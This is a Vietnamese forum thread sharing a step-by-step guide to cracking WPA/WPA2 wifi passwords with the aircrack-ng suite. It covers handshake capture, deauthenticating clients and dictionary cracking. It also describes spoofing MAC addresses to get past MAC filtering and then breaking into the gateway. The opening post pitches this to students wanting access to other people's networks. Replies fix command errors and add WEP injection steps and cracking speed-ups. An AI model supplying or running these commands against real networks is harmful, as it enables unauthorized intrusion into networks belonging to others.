Latest posts for the topic "hướng dẫn chi tiết tấn công một mạng wifi (wireless) "

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh — GMT

ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn crack wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn công cụ dùng trong bài : back track 2 live cd . download :remote exploit forum + google mac adress của máy tấn công :00:0F:B5:88:AC:82 mac adress của máy trong mạng wifi :00:0F:B5:FD:FB:C2 mac adress của acssespoint : 00:14:6C:7E:40:80 tên của mạng wifi :teddy Access point channel: 9 Wireless interface: ath0 bước 1 : chuyển wireless card qua chế độ monitor ifconfig eth0 up iwconfig eth0 mode monitor iwconfig lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 bước 2 : run airodum-ng để collect authentical : airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 * -c 9 is chanel của network - -bssid 00:14:6C:7E:40:80 is the access point MAC address. -w psk file sẽ lưu IVs ath0 is the interface name. khi thành công bạn được như sau : CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116 WPA handshake: 00:14:6C:7E:40:80” ở trên cùng nghĩa là airodump đang collect IVs file. bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha ) nhưng cách này sẽ giúp bạn rút ngắn thời gian đợi rất nhiều : run aireplay-ng để tạo ra nhiều thông tin mã hóa hơn : aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0 khi thành công : 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30] sau đó là đợi , càng lâu càng tốt nha cuối cùng run aircrack-ng để crack : aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap psk.cap là file capture ở trên password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt) khi thành công : Aircrack-ng 0.8 [00:00:00] 2 keys tested (37.20 k/s) KEY FOUND! [ 12345678 ] Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB vậy là có thể crack thành công wpa rồi lưu ý nếu bước cuối cùng không ra key thì đừng xóa file psk đi nha , copy cất kỹ đi từ từ crack nha VỚI MẠNG WIFI BỊ KHÓA MAC THÌ :khi bạn kết nối sẽ không có hiện tượng gì nhưng không kết nối được muốn vào mạng thì phải thay mac adress của mình cho giống một trong những máy trong mạng đó : bạn có thể đến gần và coi địa chỉ mac của một máy trong mạng lan đó sau đó đổi mac của mình giống với máy đó thì sẽ vào được , sau khi vào được thì cố gắng xâm nhập vào gateway lấy thêm mac

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

quanta — GMT

tranduyninh wrote:

...
tên của mạng wifi :teddy Access point channel: 9 Wireless interface: ath0
bước 1 : chuyển wireless card qua chế độ monitor ifconfig eth0 up iwconfig eth0 mode monitor iwconfig lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" ...

Hì, trên "ath0" dưới "eth0" rồi. Bạn nên định dạng bài viết cho đẹp hơn. Cái gì trích thì nên cho vào thẻ [ quote ], mã lệnh thì nên cho vào thẻ [ code ], đoạn nào cần lưu ý thì bôi đậm lên, ...

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

SuperChicken — GMT

Ây da, lâu lâu mới thấy 1 bài hay hay, để bữa nào nghịch thử xem sao :D

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tmd — GMT

Tui thấy cái này hay hơn nè anh em, Nguyên mẫu tiếng Anh của topic này ở link này đây. http://www.aircrack-ng.org/doku.php?id=cracking_wpa Tutorial: How to Crack WPA/WPA2 Version: 1.15.1 May 9, 2008 By: darkAudax

Introduction This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. he best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial. WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it. There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key. The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols. The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required. There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical. It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it. I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool. Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome. Assumptions First, this solution assumes: * You are using drivers patched for injection. Use the injection test to confirm your card can inject. * You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you may will be able to transmit packets to them. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions. * You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed. Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change “ath0” to the interface name which is specific to your wireless card. Equipment used To follow this tutorial at home, you must have two wireless cards. In this tutorial, here is what was used: * MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82 * MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2 * BSSID (MAC address of access point): 00:14:6C:7E:40:80 * ESSID (Wireless network name): teddy * Access point channel: 9 * Wireless interface: ath0 You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network. ..........

tranduyninh wrote:

ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn crack wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

nlfb — GMT

Hê hê, em gà món mạng lắm, nhưng sao cái MAC 2 bài giống nhau nhể? ;-), cái này bác copy ở đâu thế, vì công bác dịch thì chắc bác cũng sẽ bỏ thêm chút công đặt các đoạn lệnh vào tag mà. Lộ quá, lộ quá :D

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

lamhoang20002000 — GMT

@ tranduyninh: Tui có xem một cái video của nước ngoài. Hình như hướng dẫn này pác dựa theo video đó hả. I xì đúc từ các command, đến cả password "123...8" nữa. Dù sao cũng cảm ơn pác.

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh — GMT

nlfb wrote:

Hê hê, em gà món mạng lắm, nhưng sao cái MAC 2 bài giống nhau nhể? ;-), cái này bác copy ở đâu thế, vì công bác dịch thì chắc bác cũng sẽ bỏ thêm chút công đặt các đoạn lệnh vào tag mà. Lộ quá, lộ quá :D

ha cái này đúng là copy thật nhưng tiếng anh > tiếng việt cũng có công ha . e rằng trong diễn đàn ít người thích copy từ tiếng anh sang tiếng việt lắm .

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh — GMT

quanta wrote:

tranduyninh wrote:

...
tên của mạng wifi :teddy Access point channel: 9 Wireless interface: ath0
bước 1 : chuyển wireless card qua chế độ monitor ifconfig eth0 up iwconfig eth0 mode monitor iwconfig lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" ...
Hì, trên "ath0" dưới "eth0" rồi. Bạn nên định dạng bài viết cho đẹp hơn. Cái gì trích thì nên cho vào thẻ [ quote ], mã lệnh thì nên cho vào thẻ [ code ], đoạn nào cần lưu ý thì bôi đậm lên, ...

cám ơn bro nhắc nhở

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tmd — GMT

Nếu không ai nói thì cái công "tự nhận" và "convert sai kỹ thuật" được ém luôn. Lỡ có ai đó không rành kỹ thuật vào coi sẽ hiểu sai vấn đề. Nói thẳng ra là ăn cắp bản quyền tác giả.

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

eyesdog — GMT

Các tut ngon nhất của tây nhiều khi nói vậy nhưng không phải vậy, không thử, không hiểu, thực hiện máy móc theo tut mà được thì tôi chết liền !!!

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

nlfb — GMT

-c 9 is chanel của network

Cái này có phải là translate hôn :-?

bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )

Thử chưa? Đưa cảm nhận vào à :-)

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

quanta — GMT

tranduyninh wrote:

... cái này đúng là copy thật nhưng tiếng anh > tiếng việt cũng có công ha .

Đúng là cũng có công thật. Nhưng, tôi nghĩ như này sẽ hay hơn: Từ bài viết đó, bạn nên đọc để hiểu và thực hành trên một môi trường thật, sau đó ghi lại và giải thích các bước chính. Như thế ít ra bạn còn thu được kiến thức gì đó. Tôi hỏi bạn vài câu: 1. Đoạn này của bạn có chạy được không?

tranduyninh wrote:

bước 1: chuyển wireless card qua chế độ monitor Code:
ifconfig ath0 up
iwconfig ath0 mode monitor

(Đã nhắc sửa eth0 thành ath0 nhưng cũng không sửa) 2. Tại sao bạn không dùng airmon-ng để chuyển wireless card sang chế độ monitor: Code:

# airmon-ng start ath0

tranduyninh wrote:

bước 2 : run airodum-ng để collect authentical : Code:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
* -c 9 is chanel của network - -bssid 00:14:6C:7E:40:80 is the access point MAC address. -w psk file sẽ lưu IVs ath0 is the interface name.

tranduyninh wrote:

cuối cùng run aircrack-ng để crack : Code:
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap
psk.cap là file capture ở trên password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)

"psk" là cái gì? Tại sao ở trên chỉ có -w psk, còn ở dưới "file capture" lại là psk.cap? Tóm lại, tôi có một góp ý là bạn nên "thử" thực hiện bài hướng dẫn này trên môi trường thật. Sau đó sửa lại bài viết, chú ý định dạng cho cẩn thận. Nếu không, tôi đành dời nó vào Trash. Cảm ơn.

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

mco3co — GMT

Đọc mà hoa cả mắt :-O Toàn "core" là "core" thôi à!

lamhoang20002000 wrote:

@ tranduyninh: Tui có xem một cái video của nước ngoài. Hình như hướng dẫn này pác dựa theo video đó hả. I xì đúc từ các command, đến cả password "123...8" nữa. Dù sao cũng cảm ơn pác.

Bác có video hay link thì share lên đi, để anh em tò mò làm gì! :) PS: Mình nghĩ đây là chủ đề khá hay bác nào có thông tin "hay hay" post lên đây anh em học hỏi với nhé!

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

vikjava — GMT

Hi mới tìm hiểu về wireless. Sẵn tiện cho mình hỏi luôn làm thế nào để biết mạng wifi đó dùng wep hay wpa để mã hóa dữ liệu truyền đi ?

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

4hfoo — GMT

Để biết mạng wifi có mã hóa hay không, bạn có thể dùng các phần mềm quét (wireless network scanner). Một số phần mềm khá phổ biến: NetStumbler (trong Windows), airodump-ng (trong bộ aircrack-ng) ... Thân

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

quanta — GMT

vikjava wrote:

Hi mới tìm hiểu về wireless. Sẵn tiện cho mình hỏi luôn làm thế nào để biết mạng wifi đó dùng wep hay wpa để mã hóa dữ liệu truyền đi ?

Code:

# iwlist wlan0 scan
wlan0     Scan completed :
          Cell 01 - Address: 00:40:96:57:B2:5A
                    ESSID:""
                    Mode:Master
                    Frequency:2.437 GHz (Channel 6)
                    Channel:6
                    Quality=33/100  Signal level=-89 dBm  Noise level=-87 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                    Extra:tsf=00000086ec9511d5
          Cell 02 - Address: 00:01:38:A8:2A:FD
                    ESSID:""
                    Mode:Master
                    Frequency:2.457 GHz (Channel 10)
                    Channel:10
                    Quality=81/100  Signal level=-53 dBm  Noise level=-90 dBm
                    Encryption key:on
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : TKIP CCMP
                        Authentication Suites (1) : PSK
                       Preauthentication Supported
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:tsf=000000196d72a8f8
          Cell 03 - Address: 00:18:39:EA:EE:AE
                    ESSID:""
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Channel:11
                    Quality=26/100  Signal level=-93 dBm  Noise level=-86 dBm
                    Encryption key:on
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (1) : TKIP
                        Authentication Suites (1) : PSK
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                              24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
                              12 Mb/s; 48 Mb/s
                    Extra:tsf=00000006bcfb5183
          Cell 04 - Address: 00:1D:7E:47:1B:D1
                    ESSID:""
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Channel:11
                    Quality=37/100  Signal level=-87 dBm  Noise level=-86 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:tsf=00000050e7fb3181

Bạn để ý phần IE: Ngoài ra, bạn có thể dùng NetworkManager, chí vào "Cell" định kết nối, bạn sẽ biết:

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh — GMT

cả tuần mới có dịp lên mạng , vào hva thấy bị nhắc nhở buồn quá . cũng lưu ý các bạn là khi mình dùng cách trên với broadcom wireless thì nó cứ trơ ra .

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

pnco — GMT

tranduyninh wrote:

cả tuần mới có dịp lên mạng , vào hva thấy bị nhắc nhở buồn quá . cũng lưu ý các bạn là khi mình dùng cách trên với broadcom wireless thì nó cứ trơ ra .

Buồn gì, có người nhắc nhở chứng tỏ là có người quan tâm tới bạn.

Ây da, lâu lâu mới thấy 1 bài hay hay, để bữa nào nghịch thử xem sao

Nghe câu này thấy không buồn chứ :D

Tóm lại, tôi có một góp ý là bạn nên "thử" thực hiện bài hướng dẫn này trên môi trường thật. Sau đó sửa lại bài viết, chú ý định dạng cho cẩn thận.

Bạn nên cảm thấy quý trọng những lời góp ý chân thành như thế này, nó sẽ giúp bạn tiến bộ hơn lên.

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

quanta — GMT

eyesdog wrote:

Các tut ngon nhất của tây nhiều khi nói vậy nhưng không phải vậy, không thử, không hiểu, thực hiện máy móc theo tut mà được thì tôi chết liền !!!

Tớ đồng ý với quan điểm này. Chẳng hạn, tớ dùng Fedora 9, cài aircrack-ng bằng yum. Thông tin wireless card như sau: Code:

# lsmod | grep 3945
iwl3945               145244  0 
mac80211              185184  1 iwl3945
cfg80211               24712  2 iwl3945,mac80211

Code:

# lspci | grep Wireless
06:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)

Cài xong, hăm hở thử thực hiện. Ngay bước đầu tiên, chuyển wireless card sang chế độ "monitor" đã gặp ngay lỗi: Code:

# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0                   iwl3945 - [phy0]/usr/sbin/airmon-ng: line 338: /sys/class/ieee80211/phy0/add_iface: No such file or directory
mon0: unknown interface: No such device

                                (monitor mode enabled on mon0)

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

dangkita — GMT

hack wifi chả dễ tí nào! Làm rất mệt ( tớ chưa thành công bao giờ cả)! Mà còn tuỳ loại card của mình nữa, phải xem phần mềm có hỗ trợ card đó hay không, nếu không thì cũng...vứt!

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

tranduyninh — GMT

cám ơn mọi người đã quan tâm chăm sóc .

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

helllove — GMT

tranduyninh wrote: ... cái này đúng là copy thật nhưng tiếng anh > tiếng việt cũng có công ha . Đúng là cũng có công thật. Nhưng, tôi nghĩ như này sẽ hay hơn: Từ bài viết đó, bạn nên đọc để hiểu và thực hành trên một môi trường thật, sau đó ghi lại và giải thích các bước chính. Như thế ít ra bạn còn thu được kiến thức gì đó. Tôi hỏi bạn vài câu: 1. Đoạn này của bạn có chạy được không? tranduyninh wrote: bước 1: chuyển wireless card qua chế độ monitor Code: ifconfig ath0 up iwconfig ath0 mode monitor (Đã nhắc sửa eth0 thành ath0 nhưng cũng không sửa) 2. Tại sao bạn không dùng airmon-ng để chuyển wireless card sang chế độ monitor: Code: # airmon-ng start ath0 3. tranduyninh wrote: bước 2 : run airodum-ng để collect authentical : Code: airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 * -c 9 is chanel của network - -bssid 00:14:6C:7E:40:80 is the access point MAC address. -w psk file sẽ lưu IVs ath0 is the interface name. tranduyninh wrote: cuối cùng run aircrack-ng để crack : Code: aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap psk.cap là file capture ở trên password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt) "psk" là cái gì? Tại sao ở trên chỉ có -w psk, còn ở dưới "file capture" lại là psk.cap? Tóm lại, tôi có một góp ý là bạn nên "thử" thực hiện bài hướng dẫn này trên môi trường thật. Sau đó sửa lại bài viết, chú ý định dạng cho cẩn thận. Nếu không, tôi đành dời nó vào Trash. Cảm ơn. Mình nghĩ bạn ấy tuy copy,nhưng quá trình mình thấy cũng okie đấy chứ airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 =>>> psk là cái tên file nguoi crack đặt,và file ra sẽ có đuôi psk.cap,đó la default .=> "psk" là cái gì? Tại sao ở trên chỉ có -w psk, còn ở dưới "file capture" lại là psk.cap?.Đây là câu trả lời cho bạn tranduyninh thân chào

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

hanjyung — GMT

Cái này là crack WEP-key 64 bit chứ WPA nỗi gì. Nếu muốn Crack WEP-key nhanh không tốn nhiều công sức thì tham khào trang này. http://thegioimang.org/forum/showthread.php?t=394

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

quanta — GMT

hanjyung wrote:

Cái này là crack WEP-key 64 bit chứ WPA nỗi gì. Nếu muốn Crack WEP-key nhanh không tốn nhiều công sức thì tham khào trang này. http://thegioimang.org/forum/showthread.php?t=394

Cái "này" là cái nào? Bạn đọc http://www.aircrack-ng.org/doku.php?id=cracking_wpa chưa?

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

vikjava — GMT

Một hướng dẫn về thiết lập mô hình tấn công wireless khá đầy đủ http://my.opera.com/thuynt/blog/2008/05/22/ky-thuat-do-khoa-wep-cua-mang-wifi-step-by-step Trên mạng có rất nhiều video mô tả quá trình tấn công vào mạng wireless nhưng cái nì Cracking a 128 Bit Wep key(auditor) là dễ hiểu nhất. Một số cái khác thì cũng cùng bản chất nhưng có thể dùng tool khác , và môi trường khác.

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

TheShinichi — GMT

Sặc !!! Cái này vừa thử ở cơ quan xong ! Coi theo bài gốc của aircrack-ng.org (chứ ko phải cái bài dịch cẩu thả ở trên) nhưng kết quả dù có cùng lúc 5-6 clients kết nối để auth vẫn không dò ra password. Bởi vì pass được dò trong file password.lst. Dò mãi ko ra nhưng khi tôi copy cái password của mình bỏ vào trong file ấy thì nó dò ra ngay ! Như vậy có thể kết luận chỉ cần đặt 1 password mạnh là có thể an tâm không bị dò ra ! Nhân đây cũng có 1 thắc mắc nhỏ, ở quá trình dò pass trên file, cái aircrack chỉ dò ở khoảng 200 dòng đầu của file password.lst, dù trong file có mấy ngàn dòng ? Các bạn cho biết lý do tại sao nhé ! Thân !

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

dq0511 — GMT

Quan trọng la bạn crack WEP hay la WPA2 . WPA2 thì hên xui, vì nó crack chủ yếu - dictionary , bruteforce. @the shinichi: Mình chỉ dùng airolib complie cái file password lại thì aircrack nó sẽ nhanh hơn rất nhiều ( khoảng 60k words/s trở lên +pyrit). Còn cái file password đào đâu ra thì 1 là dùng MD5 harsh ra , 2 là down về cho gọn ( có cai rainbow table 33gb : 1mil words, 1k+ essid) Còn để file txt dò thì rất chậm khoảng 300 - 500 words/s .

Hanjyung có nói: Cái này là crack WEP-key 64 bit chứ WPA nỗi gì. Nếu muốn Crack WEP-key nhanh không tốn nhiều công sức thì tham khào trang này. http://thegioimang.org/forum/showthread.php?t=394

bạn thật là TÀI... thấy 4-way hand shake + với lại opt password file kia ko... Còn về window crack wifi thì 1 câu thôi " Wang nó đi, phí thời gian" @tranduyminh: mình xin chỉnh lại cho bạn 1 tí Chạy airodump-ng xong thì phai deauth 1 client để lấy những cái packet đầu => 4way handshake. => ko có cái này ko inject hay làm j đc. Bạn dịch thiếu phần này sẽ gây hiểu lầm giữa crack WEP và crack WPA. @helllove: Tại vì opt -w có nghĩa write xuống theo định dạng là *.cap + 1 file .txt. Nếu bạn ko tin thì bạn có thể vào trong thư mục root/user hoặc thư mục nào bạn -w xuống. Cho nên ở lệnh aircrack-ng thì phải để psk.cap vì nó sẽ báo no diectory found nếu để psk không.

Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless)

nhutdm — GMT

tranduyninh wrote:

cả tuần mới có dịp lên mạng , vào hva thấy bị nhắc nhở buồn quá . cũng lưu ý các bạn là khi mình dùng cách trên với broadcom wireless thì nó cứ trơ ra .

Nếu bạn sử dụng Ubuntu thì có lẽ sẽ dễ dàng thực hiện hơn. Với wireless card Broadcom BCM43xx bạn có thể tìm driver b43-fwcutter. Mình tìm được một link hướng dẫn thêm patch cho kernel và biên dịch kernel cho Ubuntu 9.10 ở đây http://hacking-library.com/forum/viewtopic.php?f=36&t=201&start=0, bạn có thể làm theo hướng dẫn.

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

luckyluke113 — GMT

Mình đang nghiên cứu cái Wireless Hacking nên có vài kinh nghiệm muốn chia sẻ với anh em : 1. Muốn hack được cái pass Wireless thì phải có client nào đó đang associated với AP , và Client đó nằm trong phạm vi "bắt sóng" của card mạng của bạn (nghe giang hồ đồn là hack được ngay cả khi ko có client bằng kỹ thuật korek và fragment nhưng mình test nhiều lần rồi mà vẫn ko thành công , có thể là do mấy cái AP mới nó khắc phục được cái này) 2. Các bước cơ bản thường là : _ active cái NIC wireless (nếu nó chưa được active) _ chuyển NIC qua chế độ Monitor , tùy cấu trúc phần phần cứng phần mềm mà interface của NIC wireless có tên là ath hay là wlan , và cũng tùy cấu trúc mà dùng lệnh iwconfig hoặc là airmon-ng để chuyển chế độ _ dùng airodump-ng (hoặc kismet) để scan mạng ko dây , rồi chỉ định cái AP cụ thể nào cần tấn công _ đối với WEP : đơn giản là đợi khi nào đủ gói (đợi cái cột data nó lên trên 50K cho chắc ăn) thì dùng aircrack thịt nó , nếu thằng client ít hoạt động thì khó mà đợi cho đến khi bắt được 50K , do đó phải dùng aireplay-ng -0 "đá" nó văng ra , nó sẽ phải gởi yêu cầu reconnect , rồi dùng aireplay-ng -3 bơm ARP vào (nên phục kích -3 trước rồi mới đá bằng -0 sau) , chi tiết dùng mấy cái lệnh nào thế nào thì các bác tự kiếm nhé _ đối với WPA : quan trọng là bắt được cái 4-way handshake thì việc bẻ khóa mới thực hiện được. Cũng dùng aireplay-ng -0 đá nó ra , nó yêu cầu kết nối , ngay lúc đó cái sẽ chụp được cái 4-way handshake. Rồi dùng aircrack + từ điển thịt nó (hình như thằng aircrack này nó chỉ có thể dò từ khóa trong file từ điển chứ nó ko bít tổ hợp hay là bruteforce , nghĩa là trong từ điển phải có chính xác từ khóa trùng với password thì mới có kết quả)

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

vodoc_90 — GMT

tớ thấy thầy tớ làm không đến 2 phút . i love master ... để hum nÀO đc học đến bài hack wifi sẽ bảo các pro ^^! .

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

luckyluke113 — GMT

Demo Hack Wireless với điều kiện lý tưởng thì 2 phút là chuyện thường Làm thực tế, dò cái pass WPA có khi cả ngày cũng chưa ra đấy bạn ạ

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

thankiemat5a — GMT

link die rôi ông anh ơi :-(

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

SweatDream — GMT

Các huynh cho em hỏi em dùng http://www.aircrack-ng.org/doku.php?id=slitaz (WireShark) để lấy packets nhưng em lại không biết cách tạo KEY từ Packets. Các huynh chỉ em với Packets của em: http://tinyurl.com/yazf5ol Thanks!

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

niteo4 — GMT

mình thấy có đoạn flash này hướng dẫn mà chưa thử bao giờ,up lên cho anh em xem thử...mà nhờ anh em làm sao lưu hộ cái file flash này xem offline được không http://www.offensive-security.com/videos/bt3teaser/bt3teaser.html

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

niteo4 — GMT

mình tìm trên net có cái đoạn flash này mà chưa thử làm theo bao giờ.anh em xem thử nha.mà ai lưu giùm mình cái file flash về xem offline đi,mình làm mãi mà không được http://www.offensive-security.com/videos/bt3teaser/bt3teaser.html

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

luckyluke113 — GMT

2 cái clip made by myself đây (làm trong điều kiện lý tưởng) WPA Code:

http://www.youtube.com/watch?v=hqL2efcUoVc

WEP Code:

http://www.youtube.com/watch?v=fIV8yh5AqrM

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

bonghonghoanggia — GMT

hay đây! tiếc là chỗ mình ko có mạng wifi để thực hành. hic

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

myquartz — GMT

Hehe! Bài viết trên có thể crack được cái này: /hvaonline/posts/list/33419.html không? === Ở đây bán khiên với giáo cùng với nhau. ===

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

nhanth87 — GMT

myquartz wrote:

Hehe! Bài viết trên có thể crack được cái này: /hvaonline/posts/list/33419.html không? === Ở đây bán khiên với giáo cùng với nhau. ===

Bó tay :). Captive portal nó còn không qua được nữa thì đừng nói tới cert.

hướng dẫn chi tiết tấn công một mạng wifi (wireless)

geniuzzz — GMT

đối với WPA : quan trọng là bắt được cái 4-way handshake thì việc bẻ khóa mới thực hiện được. Cũng dùng aireplay-ng -0 đá nó ra , nó yêu cầu kết nối , ngay lúc đó cái sẽ chụp được cái 4-way handshake. Rồi dùng aircrack + từ điển thịt nó (hình như thằng aircrack này nó chỉ có thể dò từ khóa trong file từ điển chứ nó ko bít tổ hợp hay là bruteforce , nghĩa là trong từ điển phải có chính xác từ khóa trùng với password thì mới có kết quả)

